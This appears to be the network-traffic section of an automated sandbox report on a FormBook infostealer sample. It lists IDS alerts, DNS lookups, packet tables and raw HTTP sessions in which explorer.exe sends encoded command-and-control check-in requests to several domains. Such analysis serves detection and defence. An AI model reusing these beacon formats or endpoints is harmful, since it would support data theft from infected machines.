                                                01/13/21-21:12:37.794760TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.794.23.162.163
                                                01/13/21-21:12:37.794760TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.794.23.162.163

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 13, 2021 21:10:52.893829107 CET4973680192.168.2.7198.54.117.212
                                                Jan 13, 2021 21:10:53.087019920 CET8049736198.54.117.212192.168.2.7
                                                Jan 13, 2021 21:10:53.087204933 CET4973680192.168.2.7198.54.117.212
                                                Jan 13, 2021 21:10:53.087260008 CET4973680192.168.2.7198.54.117.212
                                                Jan 13, 2021 21:10:53.280782938 CET8049736198.54.117.212192.168.2.7
                                                Jan 13, 2021 21:10:53.280811071 CET8049736198.54.117.212192.168.2.7
                                                Jan 13, 2021 21:11:13.700478077 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:13.853765965 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:13.854218960 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:13.854321003 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.007781029 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010126114 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010157108 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010183096 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010204077 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010230064 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010255098 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010267019 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.010292053 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010328054 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010338068 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.010354042 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010355949 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.010376930 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.010386944 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.010463953 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.010483027 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:14.163537979 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.163564920 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.163583040 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.163597107 CET8049748198.185.159.144192.168.2.7
                                                Jan 13, 2021 21:11:14.163702011 CET4974880192.168.2.7198.185.159.144
                                                Jan 13, 2021 21:11:34.332179070 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.454886913 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.455020905 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.455173969 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.578001022 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578423023 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578466892 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578505039 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578524113 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.578537941 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578564882 CET8049751199.59.242.153192.168.2.7
                                                Jan 13, 2021 21:11:34.578619957 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.578633070 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:11:34.578732967 CET4975180192.168.2.7199.59.242.153
                                                Jan 13, 2021 21:12:15.078027010 CET4975380192.168.2.7198.54.117.216
                                                Jan 13, 2021 21:12:15.271030903 CET8049753198.54.117.216192.168.2.7
                                                Jan 13, 2021 21:12:15.271609068 CET4975380192.168.2.7198.54.117.216
                                                Jan 13, 2021 21:12:15.271634102 CET4975380192.168.2.7198.54.117.216
                                                Jan 13, 2021 21:12:15.464456081 CET8049753198.54.117.216192.168.2.7
                                                Jan 13, 2021 21:12:15.464478970 CET8049753198.54.117.216192.168.2.7

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 13, 2021 21:09:45.383290052 CET5976253192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:45.431385040 CET53597628.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:46.213342905 CET5432953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:46.289103031 CET53543298.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:47.527028084 CET5805253192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:47.574978113 CET53580528.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:49.160665035 CET5400853192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:49.216960907 CET53540088.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:50.436703920 CET5945153192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:50.484787941 CET53594518.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:51.285056114 CET5291453192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:51.332950115 CET53529148.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:53.187374115 CET6456953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:53.238095999 CET53645698.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:54.323712111 CET5281653192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:54.371817112 CET53528168.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:55.128150940 CET5078153192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:55.184387922 CET53507818.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:56.594408035 CET5423053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:56.650571108 CET53542308.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:57.539915085 CET5491153192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:57.590590000 CET53549118.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:58.354545116 CET4995853192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:58.402280092 CET53499588.8.8.8192.168.2.7
                                                Jan 13, 2021 21:09:59.323930025 CET5086053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:09:59.380130053 CET53508608.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:01.793132067 CET5045253192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:01.844028950 CET53504528.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:03.815191031 CET5973053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:03.865916967 CET53597308.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:05.293884993 CET5931053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:05.341881990 CET53593108.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:16.444371939 CET5191953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:16.495040894 CET53519198.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:31.819948912 CET6429653192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:31.880561113 CET53642968.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:33.676992893 CET5668053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:33.724833012 CET53566808.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:33.822062016 CET5882053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:33.872958899 CET53588208.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:35.072426081 CET6098353192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:35.128694057 CET53609838.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:44.868195057 CET4924753192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:44.985723019 CET53492478.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:52.801038980 CET5228653192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:52.886651993 CET53522868.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:54.640525103 CET5606453192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:54.691359043 CET53560648.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:55.284481049 CET6374453192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:55.332387924 CET53637448.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:55.974836111 CET6145753192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:56.039463997 CET53614578.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:56.531368971 CET5836753192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:56.579288006 CET53583678.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:57.135870934 CET6059953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:57.192406893 CET53605998.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:57.687683105 CET5957153192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:57.754221916 CET53595718.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:57.785339117 CET5268953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:57.841840029 CET53526898.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:58.462209940 CET5029053192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:58.523698092 CET53502908.8.8.8192.168.2.7
                                                Jan 13, 2021 21:10:59.448185921 CET6042753192.168.2.78.8.8.8
                                                Jan 13, 2021 21:10:59.504311085 CET53604278.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:00.372001886 CET5620953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:00.431313038 CET53562098.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:01.567617893 CET5958253192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:01.623941898 CET53595828.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:13.615251064 CET6094953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:13.698755026 CET53609498.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:14.612977982 CET5854253192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:14.672179937 CET53585428.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:17.720664978 CET5917953192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:17.768726110 CET53591798.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:34.186785936 CET6092753192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:34.330919981 CET53609278.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:39.189233065 CET5785453192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:39.240015030 CET53578548.8.8.8192.168.2.7
                                                Jan 13, 2021 21:11:54.762265921 CET6202653192.168.2.78.8.8.8
                                                Jan 13, 2021 21:11:54.825834036 CET53620268.8.8.8192.168.2.7
                                                Jan 13, 2021 21:12:15.015460014 CET5945353192.168.2.78.8.8.8
                                                Jan 13, 2021 21:12:15.077068090 CET53594538.8.8.8192.168.2.7
                                                Jan 13, 2021 21:12:37.666367054 CET6246853192.168.2.78.8.8.8
                                                Jan 13, 2021 21:12:37.738413095 CET53624688.8.8.8192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Jan 13, 2021 21:10:52.801038980 CET192.168.2.78.8.8.80xfcebStandard query (0)www.seak.xyzA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:13.615251064 CET192.168.2.78.8.8.80x4996Standard query (0)www.cptdesignstudio.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:34.186785936 CET192.168.2.78.8.8.80xea45Standard query (0)www.demenageseul.comA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:54.762265921 CET192.168.2.78.8.8.80xfc0aStandard query (0)www.besthandstool.icuA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.015460014 CET192.168.2.78.8.8.80x1391Standard query (0)www.concur.designA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:37.666367054 CET192.168.2.78.8.8.80x5abeStandard query (0)www.spontaneoushomeschooler.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)www.seak.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:10:52.886651993 CET8.8.8.8192.168.2.70xfcebNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:13.698755026 CET8.8.8.8192.168.2.70x4996No error (0)www.cptdesignstudio.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                Jan 13, 2021 21:11:13.698755026 CET8.8.8.8192.168.2.70x4996No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:13.698755026 CET8.8.8.8192.168.2.70x4996No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:13.698755026 CET8.8.8.8192.168.2.70x4996No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:13.698755026 CET8.8.8.8192.168.2.70x4996No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:34.330919981 CET8.8.8.8192.168.2.70xea45No error (0)www.demenageseul.com199.59.242.153A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:11:54.825834036 CET8.8.8.8192.168.2.70xfc0aName error (3)www.besthandstool.icunonenoneA (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)www.concur.designparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:15.077068090 CET8.8.8.8192.168.2.70x1391No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                Jan 13, 2021 21:12:37.738413095 CET8.8.8.8192.168.2.70x5abeNo error (0)www.spontaneoushomeschooler.com94.23.162.163A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.seak.xyz
                                                • www.cptdesignstudio.com
                                                • www.demenageseul.com
                                                • www.concur.design

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.749736198.54.117.21280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 21:10:53.087260008 CET8264OUTGET /uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI HTTP/1.1
                                                Host: www.seak.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.749748198.185.159.14480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 21:11:13.854321003 CET10518OUTGET /uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI HTTP/1.1
                                                Host: www.cptdesignstudio.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 21:11:14.010126114 CET10519INHTTP/1.1 400 Bad Request
                                                Cache-Control: no-cache, must-revalidate
                                                Content-Length: 77564
                                                Content-Type: text/html; charset=UTF-8
                                                Date: Wed, 13 Jan 2021 20:11:13 UTC
                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                Pragma: no-cache
                                                Server: Squarespace
                                                X-Contextid: FD8MEzge/nSdEqhWm
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.749751199.59.242.15380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Jan 13, 2021 21:11:34.455173969 CET10576OUTGET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1
                                                Host: www.demenageseul.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Jan 13, 2021 21:11:34.578423023 CET10578INHTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Wed, 13 Jan 2021 20:11:34 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BrexZeIznVArJdY5nYE9ATiKEnq5umVgwyMBtdz0YLTpWwztglz+HJIoUEkyZIlRq7W81AgncmjqvBemHNJKjw==
                                                Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 42 72 65 78 5a 65 49 7a 6e 56 41 72 4a 64 59 35 6e 59 45 39 41 54 69 4b 45 6e 71 35 75 6d 56 67 77 79 4d 42 74 64 7a 30 59 4c 54 70 57 77 7a 74 67 6c 7a 2b 48 4a 49 6f 55 45 6b 79 5a 49 6c 52 71 37 57 38 31 41 67 6e 63 6d 6a 71 76 42 65 6d 48 4e 4a 4b 6a 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
